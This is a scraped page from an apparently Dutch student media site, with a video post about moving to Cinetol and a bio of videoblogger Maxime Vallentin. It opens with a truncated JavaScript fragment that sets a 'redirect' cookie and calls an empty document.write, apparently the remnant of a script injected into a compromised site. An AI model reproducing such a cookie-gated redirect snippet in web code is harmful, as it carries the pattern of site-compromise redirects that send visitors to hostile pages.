=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}">
Close

Video

Wij verhuizen naar Cinetol!

Reacties

Nog geen reacties

Laat een bericht achter

Gepost op 18 juni door:

Reporter

Maxime Vallentin

Ik heet Maxime en ik ben videoblogger voor de PIT. Daarnaast zit ik ook in de event redactie. Ik kijk op een filmische wijze naar de wereld en ben een groot levensgenieter.
In de toekomst wil ik graag industrieel designer worden. Als het gaat om muziek hou ik van alles, als ik uitga liefst techno maar thuis luister ik alle genres, van jazz tot hiphop. Ik heb een grote bek maar een hart van goud, een doorzettingsvermogen waar je U tegen zegt en ben ook redelijk eigenwijs. Ik hou van lol maken en van avontuur. Daarnaast ben ik gefascineerd door de helaasheid der dingen.

Posts
Maxime
Vallentin